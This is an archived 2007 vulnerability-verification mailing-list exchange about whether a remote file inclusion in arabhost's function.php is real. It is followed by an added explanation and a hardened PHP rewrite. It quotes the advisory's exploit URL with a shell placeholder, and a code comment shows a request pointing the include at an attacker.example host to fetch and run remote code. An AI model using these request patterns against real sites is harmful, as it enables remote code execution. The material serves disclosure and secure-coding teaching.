[VIM] Verified: arabhost function.php RFI

str0ke str0ke at milw0rm.com
Tue Feb 27 10:20:02 EST 2007


Bill "That's False Too!" Heinbockel,

I umm tested this a while back and the file includes/protaction.php did exist. :(

In the email back to the author I stated:

includes/protaction.php contains $adminfloder :(

Very strange.

/str0ke

On 2/27/07, Heinbockel, Bill <heinbockel at mitre.org> wrote:
> BUGTRAQ:20070222 Hasadya Raed
> http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded
>
> > B.File :
> > function.php
> >
> > V.Code :
> > include($adminfloder");
> >
> > Expl :
> http://www.victim.com/path/function.php?adminfolder=[Shell-Attack]
>
>
> Since the script download at
> http://delmaa.com/upfile/users/arabHost.zip
> is currently 404. I'll refer to the Google Code cache of
> arabHost/function.php:
>
> http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:CSW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip&cs_f=arabHost/function.php
>
> Code (lines 1-4):
> > <?php
> >
> > include("includes/protaction.php");
> > include("$adminfloder/config.php");
>
> And the package contains no "includes/protaction.php" file (and
> the ReadMe.html is in Arabic), so this issue does appear valid.
>
>
> Sorry jericho, no disputes this time.
>
> Bill "That's False Too!" Heinbockel
> Infosec Engineer
> The MITRE Corporation
> 202 Burlington Rd. MS S145
> Bedford, MA 01730
> heinbockel at mitre.org
> 781-271-2615
>
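The pattern under dispute above, as an added example (this is not arabHost's code and not from either poster): the two quoted lines from function.php reproduced as a comment, a note on why they are only exploitable under register_globals, and a hardened replacement. The constant, function and parameter names (ADMIN_DIR, resolve_admin_dir, resolve_include_path, the `admin` query parameter, the attacker host) are assumptions chosen for illustration. Note that under register_globals the injected query parameter must carry the variable's actual name, `adminfloder`, not the `adminfolder` shown in the advisory's example URL, and that if includes/protaction.php unconditionally assigns $adminfloder the injected value is overwritten before the second include runs, which is what str0ke's observation would imply; if protaction.php merely reads or conditionally sets it, the RFI stands.

```php
<?php
// Added example, not arabHost's code.
//
// Vulnerable pattern as quoted from arabHost/function.php in the thread:
//
//   include("includes/protaction.php");
//   include("$adminfloder/config.php");
//
// With register_globals=On, a request such as
//   function.php?adminfloder=http://attacker.example/x
// initialises $adminfloder from the query string before any script code runs
// (the parameter name must match the variable name, so "adminfloder", not the
// advisory's "adminfolder"). Unless includes/protaction.php assigns
// $adminfloder itself afterwards, PHP then fetches and executes
// http://attacker.example/x/config.php, provided allow_url_fopen (PHP < 5.2)
// or allow_url_include (PHP >= 5.2) permits remote includes.

// --- Hardened replacement (assumed names, added here) ---

// 1. Never build an include path from a variable that request data can set.
//    Fix the admin directory in one trusted place.
define('ADMIN_DIR', __DIR__ . '/admin');

// 2. If the location genuinely has to vary, choose it from a fixed allow-list
//    keyed by the request parameter; the parameter value itself never
//    becomes part of the path.
function resolve_admin_dir(string $selector): string
{
    $allowed = [
        'default' => ADMIN_DIR,
        'legacy'  => __DIR__ . '/admin_old',
    ];
    if (!array_key_exists($selector, $allowed)) {
        throw new InvalidArgumentException('unknown admin directory selector');
    }
    return $allowed[$selector];
}

// 3. Defence in depth: canonicalise the target and refuse anything that is
//    not a regular file below the application root. realpath() cannot
//    return a URL, so remote includes are impossible here even if
//    allow_url_include is on. The include itself happens at file scope so
//    that variables set by config.php land in the global scope, as the
//    original code expected.
function resolve_include_path(string $file): string
{
    $real = realpath($file);
    $root = realpath(__DIR__) . DIRECTORY_SEPARATOR;
    if ($real === false || !is_file($real) || strpos($real, $root) !== 0) {
        throw new RuntimeException('include outside application root refused');
    }
    return $real;
}

$selector = isset($_GET['admin']) ? (string) $_GET['admin'] : 'default';
include resolve_include_path(resolve_admin_dir($selector) . '/config.php');
```

On a host where the code cannot be changed, turning register_globals off (and allow_url_include, or allow_url_fopen on PHP 4) removes the remote-include vector for this pattern, but an uninitialised $adminfloder then still produces a predictable local include path, which is why the allow-list and root check above are the durable fix.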
